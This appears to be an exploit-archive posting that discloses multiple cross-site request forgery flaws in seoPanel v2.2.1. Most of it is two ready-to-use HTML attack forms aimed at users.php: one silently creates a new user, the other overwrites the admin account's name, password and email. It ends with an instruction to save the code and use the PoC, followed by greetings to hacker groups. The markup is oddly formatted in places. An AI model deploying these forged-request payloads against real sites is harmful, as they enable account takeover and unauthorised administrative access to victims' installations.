Title: seoPanel (v.2.2.1) Multiple CSRF Vulnerabilities
# Author: KedAns-Dz
# E-mail: ked-h@hotmail.com | ked-h@exploit-id.com
# Home: HMD/AM (0, 30008/04300)-Algeria-(00213555248701)
# Web Site: www.1337day.com * www.exploit-id.com * www.09exploit.com
# Twitter page: twitter.com/kedans
# Platform: php
# Impact: CSRF => (Add New User [+] Change Admin Account Settings)
# Tested on: Windows XP sp3 FR & Linux. (Ubuntu 10.10) En
###
#(~) Greetings To: Caddy-Dz (+) JaGo-Dz (+) Dr. Ride (+) All My Friends
###
# (+) Exploit: Muliple <Cross-Site Request Forgery >=>
#======= [CSRF (1) Add New User] ==========================>
<Form id = "newUser" action = "http://www.bkjia.com/users.php" method = "POST"
Onclick = "scriptDoLoadPost (users. php, newUser, content )"
Href = "javascript: void (0);" class = "actionbut">
<Table>
<Input type = "hidden" name = "sec" value = "create">
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "text" name = "userName" value = "KedAns-Dz"> </td> </tr>
<Tr class = "blue_row"> <td class = "td_right_col">
<Input type = "password" name = "password" value = ""> </td> </tr>
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "password" name = "confirmPassword" value = ""> </td> </tr>
<Tr class = "blue_row"> <td class = "td_right_col">
<Input type = "text" name = "firstName" value = "Ked"> </td> </tr>
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "text" name = "lastName" value = "Ans"> </td> </tr>
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "text" name = "email" value ="Ked-h@hotmail.com "> </td> </tr>
</Table>
<Input type = "submit" value = "Add New User! "> </Td> </tr>
</Form>
#======= [CSRF (2) Change Admin Account Settings] ========================>
<Form id = "updateUser" action = "http://www.bkjia.com/users.php" method = "POST"
Onclick = "confirmSubmit (users. php, updateUser, content )"
Href = "javascript: void (0);" class = "actionbut">
<Table>
<Input type = "hidden" name = "sec" value = "update">
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "text" name = "userName" value = "admin"> </td> </tr>
<Tr class = "blue_row"> <td class = "td_right_col">
<Input type = "password" name = "password" value = ""> </td> </tr>
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "password" name = "confirmPassword" value = ""> </td> </tr>
<Tr class = "blue_row"> <td class = "td_right_col">
<Input type = "text" name = "firstName" value = "admin"> </td> </tr>
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "text" name = "lastName" value = "owner"> </td> </tr>
<Tr class = "white_row"> <td class = "td_right_col">
<Input type = "text" name = "email" value ="Ked-h@hotmail.com "> </td> </tr>
</Table>
<Input type = "submit" value = "Change Account Settings! "> </Td> </tr>
</Form>
[++ --- = {Exploiting: Save Any HTML Code and Use The PoC! } = --- ++]
# (^_^ )! Good Luck ALL...
#=================== [Exploited By KedAns-Dz * HST-Dz *] ============ ======================================
# Greets To: [D] HaCkerS-StreeT-Team [Z] <Algerians HaCkerS>
# + Greets To Inj3ct0r Operators Team: r0073r * Sid3 ^ effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337: Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix *
# Gunslinger _ * Sn! PEr. S! Te * ZoRLu * anT! -Tr0J4n * ^ Xecuti0N3r www.1337day.com/team ++ ....
# Exploit-Id Team: jos_ali_joe + Caddy-Dz (exploit-id.com)... All Others * TreX (hotturks.org)
# JaGo-Dz (sec4ever.com) * CEO (0nto. me) * PaCketStorm Team (www.packetstormsecurity.org)
# Asploit.com "> www.metasploit.com * UE-Team (www.09exploit.com) * All Security and Exploits Webs...
#===================================================== ====================================